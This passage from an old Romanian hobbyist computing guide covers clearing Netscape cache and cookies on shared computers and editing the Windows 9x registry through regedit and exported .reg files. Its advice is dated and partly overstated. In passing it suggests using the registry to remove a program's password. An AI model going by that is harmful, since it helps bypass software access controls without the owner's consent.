aceasta directorie se afla deobicei toate jpg-urile, gif, html....... Le
stergeti din directorie sau va duceti din browser la : Edit-> Preferences->
Advanced-> Cache; ii faceti "clear disk cache"; pe linga asta mai puteti seta
disk cache-ul la 0mb tot acolo;
3. Stregeti Cookies-urile: Tot in directoria Netscape/Users trebuie sa gasiti un
singur fisier: cookies.txt - intr-acest fisier se afla toata informatia
corespunzatoare fiecarui site, in fisier fiind inregistrate toate siteurile la/de_la
care au fost trimise cookies-uri. Il stergeti.
In concluzie: daca veti sterge sistematic entries-urile, disk cache-ul si
cookies-urile la computerele la care lucrati dar care nu va apartin, atunci nu
veti avea probleme.
Exista desigur exceptii...... Daca cineva va dori neaparat sa va urmareasca
activitatea, site-urile, sa se foloseasca de accounturile voastre cu ajutorul
cookies-urilor, atunci el va putea sa faca asta daca va avea pachetul Norton
Utilities pe hard-disk spre exemplu... Cu Norton Unerase el va putea obtine
cookies-urile, fisierele html, jpg, gif care s-au aflat in disk cache...
Asigurati-va ca nu se gaseste nimica din toate astea pe computer. Totusi, chiar
daca nu exista nimica din toate astea, persoana care are acces la acelasi
computer de care v-ati folosit, va putea inscrie pe computer asa fel de programe
sau va putea folosi aceste programe de pe floppy..... Atunci chiar nu mai aveti
ce face... Mai ales daca la computerul de care v-ati folosit poate fi folosit de
oricine (Intr-o Internet Cafe de exemplu).
Cam slut cu securitatea daca va folositi de acest Windows. Asa ceva nu se
tolereaza la Unix = va asigur. Doar Root-ul - sysadmin-ul va putea sti cu ce va
ocupati.
CONCLUZIE: Renuntati la soft-urile MS-ului. Puneti-va Linux. Va sfatui sa o
faceti cu o destula seriozitate.
--------------------------------------------------------------------------------
5.The Registry
Registrul este miezul sistemului de operare. Daca umblati unde nu trebuie, s-ar
putea sa fie nevoie sa va reinstalati sistemul de operare, asa ca pregatiti
diskul cu pograma de instalare si tineti-l linga voi. Insa trebuie sa stiti ca
daca aveti acces la registru, atunci controlati intregul computer. Controlul
asupra registrului este echivalent cu drepturile de root asupra unui computer cu
Unix pe dinsul.
Pentru a deschide registrul apasati pe "Start" -> Run si scriti "regedit". Sau
duceti-va la C:\windows\regedit.exe.
Cind veti deschide registrul veti vedea urmatoarele in frame-ul din partea
stinga:
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
Cei de la Microsoft cred in securitate cu obscuritate. Ei cred ca vor tine
departe utilizatorii de editarea registrului daca registrului i-au dat un nume
ciudat si daca va sta in windows directory-ul.
Aici veti afla mai multe despre registru si va veti invinge frica ce tine de
editarea lui.
Registrul controleaza tot ce tine de sistemul de operare: de la modul in care
arata desktop-ul, pina la depozitarea Internet Dial Up password-ului cu care
aveti acces la Net.
In primul rind trebuie sa umblati prin "hives-uri" (cele de mai sus se numesc
hives-uri). Sigur, nu incercati sa stergeti nimic de acolo. Pentru a vedea
diferite submenu-uri, apasati pe "+"-ul de la fiecare hive. Numele submenu-urilor
va vor da de inteles cu ce aveti de a face. Foarte mult va sfatui sa nu stergeti
nimic din ceea ce vedeti. Dupa ce ati navigat un timp si v-ati lamurit ce si
cum, e timpul sa trecem la treaba.
Sa zicem ca doriti sa schimbati modul in care lucreaza un software anumit sau
daca doriti sa remove-inguiti o parola a unui anumit program, puteti sa va
uitati la acel software sub meniul software-ului. Faceti click la
HKEY_CURRENT_USER. Apoi alegeti submeniul Software. Veti vedea o lista de
software-uri in partea stinga. In partea dreapta veti vedea un fel de "data" pe
care nu-l puteti intelege. Pentru a converti din forma pe care nu o intelegeti
intr-una pe care sa o puteti intelege usor, si s-o puteti schimba, apasati pe
anumitul menu sau topic pe care vreti sa-l schimbati intr-o "forma citibila";
dupa ce ati apasat anume pe acela pe care vreti sa-l schimbati, va duceti la
Registry heading pe Regedit menu bar. Dupa ce ati apasat pe "Registry", va
duceti la "Export Registry File". Va va intreba numele si path-ul unde doriti sa-l
export-ati; introduceti un nume la alegerea voastra.
Dupa asta deschideti wordpad-ul si porniti fisierul pe care l-ati exportat in
registru. Fisierul trebuie sa aiba extensia "reg". Va veti da seama acum ca
sunteti in stare sa intelegeti cu mult mai multe si ca a devenit foarte usor sa
editati entries-urile si sa-l customize-inguiti.
Exista o sumedenie de registry tricks-uri pe care le puteti folosi pentru a va
imbunatati performanta PC-ului, care pot fi folosite pentru a schimba modul in
care arata Windows-ul. Citeva destul de folosite sunt:
1. In loc de cuvintul "Start" scris la start button-ul, puteti sa va scrieti
numele sau orice alt cuvint doriti.
2. Schimbati Internet Explorer Logo-ul.
3. Scimbati numele Recycle Bin-ului.
4. Mariti viteza computerului.
......... si multe, multe altele.
Exista asa de multe, incit un website intreg a fost dedicat informatiei despre
registru. Trebuie sa va duceti la
http://www.regedit.com/- site dedicat intr-u totul registrului din Windows.
Gasiti acolo destule lucruri uimitoare legate de "registry hacks".
Referitor la registru. Daca doriti sa cunoasteti totul despre registru, imi
cereti Windows Registry Guide-ul v. 1.3 pe care-l am la mine. Este vorba despre
reghelp.hlp, pe care-l am impreuna cu alte 3 fisiere: reghelp.cnt, license.txt
si readme.txt. Impreuna se afla aceste 4 fisiere in directoria Reghelp. Daca o
doriti mi-o cereti arhivata de vreo 200 kb. Ma contactati la adresa: picardul@softhome.net.
In felul acesta veti avea toate informatiile la voi pe PC si nu va trebui sa va
conectati de fiecare data la internet cind veti dori sa aflati un nou trick.
Well fellow that is all for now and Happy Hacking!!!